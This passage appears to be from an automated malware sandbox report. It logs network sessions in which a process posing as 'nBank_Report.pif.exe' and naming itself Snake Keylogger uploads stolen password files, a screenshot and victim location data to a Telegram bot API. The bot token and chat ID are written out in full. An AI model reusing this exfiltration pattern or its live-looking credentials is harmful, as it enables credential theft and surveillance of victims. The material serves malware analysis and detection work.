                                              2024-09-26 09:34:20 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:20 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:21 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:21 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.1049764149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:22 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce111bd25bcee
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:22 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 31 31 62 64 32 35 62 63 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce111bd25bceeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:22 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:22 GMT
                                              Content-Type: application/json
                                              Content-Length: 506
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:22 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6347,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343262,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.1049765149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:23 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce1328b021260
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 33 32 38 62 30 32 31 32 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce1328b021260Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:23 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:25 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:25 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.1049766149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:25 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce181c0e6bebe
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:25 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 38 31 63 30 65 36 62 65 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce181c0e6bebeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:26 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:26 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
